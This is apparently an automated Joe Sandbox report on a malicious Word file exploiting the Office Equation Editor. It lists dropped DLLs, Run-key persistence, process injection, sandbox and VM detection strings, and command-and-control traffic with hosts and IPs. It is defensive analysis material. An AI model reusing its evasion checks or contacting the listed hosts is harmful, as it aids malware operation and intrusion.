Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:21.0.0
Analysis ID:487031
Start time:19:13:34
Joe Sandbox Product:Cloud
Start date:24.01.2018
Overall analysis duration:0h 9m 10s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:DoNotOpen2.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
Detection:MAL
Classification:mal96.evad.expl.troj.winDOC@7/13@7/2
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 43
  • Number of non-executed functions: 73
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 27
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, WMIADAP.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE


Detection

StrategyScoreRangeReportingDetection
Threshold960 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Signature Overview

Click to jump to signature section


Exploits:

barindex
Office Equation Editor has been startedShow sources
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: api.ipaddress.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49188 -> 209.126.119.177:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49188 -> 209.126.119.177:80
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: a.b.1.dr

Networking:

barindex
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /myip?format=txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipaddress.com
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: api.ipaddress.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /goix/nhbqad.asp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: application/jason,application/xml, q=0.9,*/*, q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-USCookie: 339hndxz=0wEEgqeI/L2qQmlVILDcCEjSuUvCsdzViNvvozbedxbAdA==; o49jg=zWVEEy8HHngAYbc+1rE0gJkrvAStoctjYgNpv4k6Szt9NkBBW93Ico9ieReFMojFzEeoAHCYHUFDrRQsvDbgYVM2KqbYbWq/OaEJQ5mDN6c=; 5f51il=InuyYTmulipC/qjau0zml1Nu7+ym09aui/5ksuwxMGq7sY44kB6xGZGq/lwuTsKXbhsr7wKboki43IbVzk8H3Si3N/B0rCRkIuwEFKiK8ys=;Host: 3.sj2xp1.paj.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoContent-Length: 3394
Urls found in memory or binary dataShow sources
Source: WINWORD.EXEString found in binary or memory: file:///
Source: WINWORD.EXEString found in binary or memory: file:///C:
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/user/Desktop/DoNotOpen2.doc
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/user/Desktop/DoNotOpen2.docE
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/user/Desktop/DoNotOpen2.docO
Source: explorer.exeString found in binary or memory: file:///C:/Users/user/Documents
Source: explorer.exeString found in binary or memory: file:///C:/Users/user/Documentsrs
Source: iexplore.exeString found in binary or memory: http://
Source: iexplore.exeString found in binary or memory: http://%s
Source: iexplore.exeString found in binary or memory: http://%sConnectType
Source: iexplore.exeString found in binary or memory: http://103.236.150.14
Source: iexplore.exeString found in binary or memory: http://103.236.150.14192.168.1.16
Source: iexplore.exeString found in binary or memory: http://api.ipaddress.com/myip?format=txt
Source: iexplore.exeString found in binary or memory: http://api.ipaddress.com/myip?format=txt1
Source: iexplore.exeString found in binary or memory: http://https://:
Source: iexplore.exeString found in binary or memory: http://https://Try
Source: WINWORD.EXEString found in binary or memory: http://schemas.openx
Source: WINWORD.EXEString found in binary or memory: http://schemas.openxDV
Source: WINWORD.EXEString found in binary or memory: http://schemas.openxmlformat
Source: WINWORD.EXEString found in binary or memory: http://schemas.openxmlformatDV
Source: explorer.exeString found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: WINWORD.EXEString found in binary or memory: http://www.
Source: explorer.exeString found in binary or memory: http://www.%s.comPA
Source: WINWORD.EXEString found in binary or memory: http://www.msnusers.com
Source: iexplore.exeString found in binary or memory: https://
Source: iexplore.exeString found in binary or memory: https://%s
Source: iexplore.exeString found in binary or memory: https://%sTry
Source: explorer.exeString found in binary or memory: https://en.wikipedia.org/wiki/XSLT/Muenchian_grouping
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: api.ipaddress.com
Source: unknownDNS query: name: api.ipaddress.com
Source: unknownDNS query: name: api.ipaddress.com
Source: unknownDNS query: name: api.ipaddress.com
Source: unknownDNS query: name: api.ipaddress.com
Source: unknownDNS query: name: api.ipaddress.com
Source: unknownDNS query: name: api.ipaddress.com

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD
Source: C:\Program Files\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD
Source: C:\Program Files\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD
Source: C:\Program Files\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD
Creates an autostart registry key pointing to binary in C:\WindowsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD

Remote Access Functionality:

barindex
Contains functionality to launch a control a shell (cmd.exe)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: \cmd.exe /c 3_2_00515486

Stealing of Sensitive Information:

barindex
Searches for user specific document filesShow sources
Source: C:\Windows\explorer.exeKey value created or modified: C:\Users\user\Documents
Source: C:\Windows\explorer.exeKey value created or modified: C:\Users\user\Documents
Source: C:\Windows\explorer.exeKey value created or modified: C:\Users\Public\Documents
Source: C:\Windows\explorer.exeKey value created or modified: C:\Users\user\Documents
Source: C:\Windows\explorer.exeKey value created or modified: C:\Users\user\Documents\QLSSZNHVJI

Persistence and Installation Behavior:

barindex
Contains functionality to read ini properties file for application configurationShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_005114F8 memset,memset,memset,SHGetSpecialFolderPathW,___swprintf_l,GetPrivateProfileStringW,memset,memset,_wfopen,fgetws,wcsstr,wcsstr,_wtoi,feof,fclose,___swprintf_l,3_2_005114F8
Drops PE filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\a.b
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\a.b

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00517143 GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,GetUserNameA,MultiByteToWideChar,WideCharToMultiByte,ConvertSidToStringSidA,3_2_00517143
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B34A3 push ecx; ret 2_2_617B34B6
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B3329 push ecx; ret 2_2_617B333C

System Summary:

barindex
Reads the Windows registered owner settingsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Uses Rich Edit ControlsShow sources
Source: C:\Windows\explorer.exeFile opened: C:\Windows\system32\MsftEdit.dll
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to development resourcesShow sources
Source: iexplore.exeBinary or memory string: 3.vbP.v
Classification labelShow sources
Source: classification engineClassification label: mal96.evad.expl.troj.winDOC@7/13@7/2
Contains functionality to check free disk spaceShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00516D52 GetModuleHandleW,GetProcAddress,GetTempPathW,GetDiskFreeSpaceExW,3_2_00516D52
Contains functionality to enum processes or threadsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F2A05 CreateToolhelp32Snapshot,memset,memset,Process32FirstW,___swprintf_l,Process32NextW,CloseHandle,3_2_004F2A05
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$NotOpen2.doc
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR12AE.tmp
Launches a second explorer.exe instanceShow sources
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the Windows registered organization settingsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\DoNotOpen2.doc
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll,Setting
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35786D3C-B075-49b9-88DD-029876E11C01}\InProcServer32
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)Show sources
Source: NavShExt.dll.3.drStatic PE information: Section: .data ZLIB complexity 0.998944256757
Detected potential crypto functionShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B223D2_2_617B223D
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F13F53_2_004F13F5
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00513ABC3_2_00513ABC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_005193613_2_00519361
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_005199583_2_00519958
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_005186ED3_2_005186ED
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_005195913_2_00519591
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00518EF83_2_00518EF8
Found potential string decryption / allocating functionsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: String function: 00517FBE appears 69 times
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\a.b

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: iexplore.exe, explorer.exeBinary or memory string: Progman
Source: iexplore.exe, explorer.exeBinary or memory string: Program Manager
Source: iexplore.exe, explorer.exeBinary or memory string: Shell_TrayWnd
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Contains functionality to inject code into remote processesShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B223D Setting,IsDebuggerPresent,CreateMutexA,GetLastError,CloseHandle,CloseHandle,memset,SHGetSpecialFolderPathA,memset,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,CreateProcessA,memset,GetModuleFileNameA,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,GetProcAddress,CreateRemoteThread,WaitForSingleObject,WaitForSingleObject,GetExitCodeThread,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,CloseHandle,2_2_617B223D
Contains functionality to inject threads in other processesShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B223D Setting,IsDebuggerPresent,CreateMutexA,GetLastError,CloseHandle,CloseHandle,memset,SHGetSpecialFolderPathA,memset,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,CreateProcessA,memset,GetModuleFileNameA,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,GetProcAddress,CreateRemoteThread,WaitForSingleObject,WaitForSingleObject,GetExitCodeThread,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,CloseHandle,2_2_617B223D

Anti Debugging:

barindex
Contains functionality to register its own exception handlerShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B2860 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_617B2860
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F32A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_004F32A0
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_0051A460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0051A460
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXESystem information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B223D Setting,IsDebuggerPresent,CreateMutexA,GetLastError,CloseHandle,CloseHandle,memset,SHGetSpecialFolderPathA,memset,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,CreateProcessA,memset,GetModuleFileNameA,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,GetProcAddress,CreateRemoteThread,WaitForSingleObject,WaitForSingleObject,GetExitCodeThread,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,CloseHandle,2_2_617B223D
Contains functionality to dynamically determine API callsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00517143 GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,GetUserNameA,MultiByteToWideChar,WideCharToMultiByte,ConvertSidToStringSidA,3_2_00517143

Malware Analysis System Evasion:

barindex
Contains functionality to query system informationShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00517535 GetSystemInfo,3_2_00517535
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: iexplore.exeBinary or memory string: vmtools.exe
Source: iexplore.exeBinary or memory string: SYSTEM\ControlSet001\services\Disk\Enum0x3A RegOpenKeyExW Disk Failed-%d0vmwareqemuvboxvirtualhdSoftware\CommViewSoftware\eEye Digital SecuritySoftware\Win SnifferSoftware\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32Software\Syser SoftSoftware\Classes\Folder\shell\sandboxSoftware\Classes\*\shell\sandboxSYSTEM\CurrentControlSet\Services\IRIS5SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WiresharkSOFTWARE\ZxSnifferSYSTEM\CurrentControlSet\Services\VBoxGuestSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest AdditionsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSandboxie%svboxtray.exevboxservice.exevmwareuser.exevmwaretray.exevmupgradehelper.exevmtoolsd.exevmacthlp.exevmtools.exeirise.exeIrisSvc.exewireshark.exeZxSniffer.exeRegshot.exeollydbg.exewindbg.exePEBrowseDbg.exeSyser.exeSandboxieRpcSs.exeSandboxieDcomLaunch.exe%02X%02X%02X%02X%02X%02X 000569000C29001C1400505600155D00163E080027H
Source: iexplore.exeBinary or memory string: SYSTEM\CurrentControlSet\Services\VBoxGuest
Source: iexplore.exeBinary or memory string: vmware
Source: iexplore.exeBinary or memory string: vmwaretray.exe
Source: iexplore.exeBinary or memory string: vmwareuser.exe
Source: iexplore.exeBinary or memory string: vmtoolsd.exe
Source: iexplore.exeBinary or memory string: vboxservice.exe
Source: iexplore.exeBinary or memory string: vboxtray.exe
Contains functionality to query network adapater informationShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: ??2@YAPAXI@Z,memset,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,memset,___swprintf_l,??3@YAXPAX@Z,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_004F2FA1
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: ??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,___swprintf_l,realloc,___swprintf_l,___swprintf_l,realloc,___swprintf_l,realloc,___swprintf_l,??3@YAXPAX@Z,3_2_005177AB
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: ??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,3_2_00514B82
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: ??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,3_2_00514AAC
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 816
Found dropped PE file which has not been started or loadedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\a.b
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 3440Thread sleep time: -60000s >= -60000s
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 3440Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3540Thread sleep time: -180000s >= -60000s
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 3536Thread sleep time: -60000s >= -60000s
Contains functionality to detect sandboxes (MAC address check)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F2FA1 ??2@YAPAXI@Z,memset,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,memset,___swprintf_l,??3@YAXPAX@Z,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_004F2FA1
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F2FA1 ??2@YAPAXI@Z,memset,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,memset,___swprintf_l,??3@YAXPAX@Z,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_004F2FA1
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F2FA1 ??2@YAPAXI@Z,memset,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,memset,___swprintf_l,??3@YAXPAX@Z,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_004F2FA1
Contains functionality to detect sandboxes (registry check)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Contains functionality to detect virtual machines (IN, VMware)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F278F in eax, dx3_2_004F278F
Tries to detect sandboxes and other dynamic analysis tools (process name)Show sources
Source: iexplore.exeBinary or memory string: WINDBG.EXE
Source: iexplore.exeBinary or memory string: IRISE.EXE
Source: iexplore.exeBinary or memory string: SANDBOXIERPCSS.EXE
Source: iexplore.exeBinary or memory string: WIRESHARK.EXE
Source: iexplore.exeBinary or memory string: IRISSVC.EXE
Source: iexplore.exeBinary or memory string: ZXSNIFFER.EXE
Source: iexplore.exeBinary or memory string: PEBROWSEDBG.EXE
Source: iexplore.exeBinary or memory string: SYSER.EXE
Source: iexplore.exeBinary or memory string: OLLYDBG.EXE
Source: iexplore.exeBinary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: iexplore.exeBinary or memory string: REGSHOT.EXE
Tries to detect virtual machinesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: vboxtray.exe vboxservice.exe vboxservice.exe vmwareuser.exe vmwaretray.exe vmtoolsd.exe vmtools.exe 3_2_004F2A05
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: vmware qemu qemu vbox 3_2_004F27E5

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
